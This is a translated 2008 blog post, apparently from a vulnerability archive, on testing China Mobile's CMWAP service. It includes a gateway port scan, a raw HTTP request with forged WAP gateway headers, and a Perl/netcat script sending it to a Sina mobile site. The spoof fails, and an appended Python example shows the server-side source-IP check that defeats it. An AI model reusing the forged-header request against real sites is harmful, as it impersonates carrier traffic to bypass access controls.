CMWAP testing - vulnerability warning - the black bar safety net

ID MYHACK58:62200818423
Type myhack58
Reporter Anonymous
Modified 2008-03-03T00:00:00


Author: demonalex Source: demonalex's diary of a madman

1. Testing ARP.

The first test was inspired by BAN: an ARP test under CMWAP. But entering CMWAP over GPRS uses the PPP protocol, which sits in a different protocol stack from ARP, so ARP does not function when connected to CMWAP over GPRS.

2. Testing the WAP GW for defects.

After connecting, I ran security scanning tools against the WAP GW and found only TCP 80 and TCP 8080 (HTTP proxy) and the WAP GW protocol ports UDP 9200 and UDP 9201; no defects have been found so far. The Guangzhou CMWAP GW IP I am currently connected through is 218.204.243.42.

3. Testing whether a fake WAP gateway header works against SP sites from outside CMWAP:

The test target locked on is:

First, create a file wap.txt. This sample was provided by BAN, thanks to him:

GET /prog/wapsite/weather_new/index.php?pos=1&vt=1 HTTP/1.1
Host: 3g.sina.com.cn
Accept: */*, text/x-vcard, text/x-vcalendar, image/gif, image/vnd.wap.wbmp
Accept-Language: zh-cn
UA-OS: Windows CE (Pocket PC) - Version 5.2
UA-color: color16
UA-pixels: 240x320
UA-Voice: TRUE
UA-CPU: ARM
Accept-Encoding: gzip,deflate
Content-length: 0
Via: WTP/1.1 (Nokia WAP Gateway 4.0/CD3/4.1.79)
X-Forwarded-For:
X-Source-ID: GGSNGZ05
X-Nokia-CONNECTION_MODE: TCP
X-Up-Bearer-Type: GPRS
X-Nokia-gateway-id: NWG/4.1/Build04
Connection: keep-alive

Note: the file must end with two extra carriage returns, equivalent to the "\r\n\r\n" that ends the headers of an HTTP session. Then write a Perl script with this content:

#!/bin/perl -w
use strict;

$| = 1;                                   # unbuffered output
# Read the request file; the second line is the Host: header
open(my $wap, "<", "wap.txt") or die "cannot open wap.txt: $!";
my @host = <$wap>;
close($wap);
chomp(@host);
my $target = $host[1];
$target =~ s/^Host: //;                   # keep only the hostname
# Send the raw request with netcat on port 80 and save the reply
system("nc.exe $target 80 <wap.txt >result.wml");
# Open the reply for inspection
system("notepad.exe result.wml");
exit 1;

After running it, result.wml opens automatically and shows:

HTTP/1.1 302 Found
Date: Sun, 02 Mar 2008 09:45:01 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Location: 17&vid=84&pos=Err403
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

14a
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="17&vid=84&pos=Err403">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.37 Server at Port 80</ADDRESS>
</BODY></HTML>


See http://3g.sina.com.cn/3g/pro/index.php?tid=254&did=817&vid=84&pos=Err403. Hey, looking at it with Opera, it is still identified as 'you are not accessing via the mobile Internet'. It seems the header is independent; my guess is that the SP has added a CMWAP GW IP address list... presumably...
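The redirect above is the behaviour a correctly written SP site should show: every gateway header in wap.txt (Via, X-Nokia-gateway-id, X-Up-Bearer-Type and the rest) is chosen by whoever sends the request, so the only thing the site can trust is the TCP source address. The following added example, which is not part of the original post or of any SP's code, shows that check as server-side logic: it parses a raw request, notes whether the gateway headers are present, and then decides "mobile" only if the connection also arrived from an allowlisted gateway address. The allowlist holds the Guangzhou gateway IP from the post as an assumed example entry, the sample request is a shortened copy of wap.txt, and the function names are this example's own.

```python
import ipaddress

# Assumed allowlist: the Guangzhou CMWAP GW address named in the post.
# A real site would load the operator's published gateway ranges instead.
CMWAP_GATEWAY_ALLOWLIST = [ipaddress.ip_network("218.204.243.42/32")]

# Constructed sample: a shortened copy of the wap.txt request from the post.
SAMPLE_REQUEST = (
    "GET /prog/wapsite/weather_new/index.php?pos=1&vt=1 HTTP/1.1\r\n"
    "Host: 3g.sina.com.cn\r\n"
    "Via: WTP/1.1 (Nokia WAP Gateway 4.0/CD3/4.1.79)\r\n"
    "X-Nokia-gateway-id: NWG/4.1/Build04\r\n"
    "X-Up-Bearer-Type: GPRS\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, header dict).

    Header names are lower-cased so lookups are case-insensitive, as HTTP
    requires.  The body, if any, is ignored here.
    """
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def has_gateway_headers(headers):
    """The signal the post's script forges: WAP gateway headers are present.

    This is client-controlled data and must never be the sole criterion.
    """
    return "via" in headers and "x-nokia-gateway-id" in headers


def is_from_cmwap_gateway(source_ip):
    """Source-address check that editing wap.txt cannot satisfy."""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net for net in CMWAP_GATEWAY_ALLOWLIST)


def classify(raw_request, source_ip):
    """Return 'mobile' only when both the headers and the source IP agree.

    Anything else gets 'not-mobile', which is where the Err403 redirect
    seen in the post belongs.
    """
    _, headers = parse_request(raw_request)
    if has_gateway_headers(headers) and is_from_cmwap_gateway(source_ip):
        return "mobile"
    return "not-mobile"


if __name__ == "__main__":
    # Same forged headers, two different source addresses (second one is a
    # constructed documentation address, not a real client).
    print(classify(SAMPLE_REQUEST, "218.204.243.42"))  # mobile
    print(classify(SAMPLE_REQUEST, "203.0.113.7"))     # not-mobile
```

The point of keeping has_gateway_headers and is_from_cmwap_gateway separate is auditability: a log line that records both results makes it easy to spot requests that carry gateway headers but arrive from a non-gateway address, which is exactly the pattern the nc.exe test in the post produces.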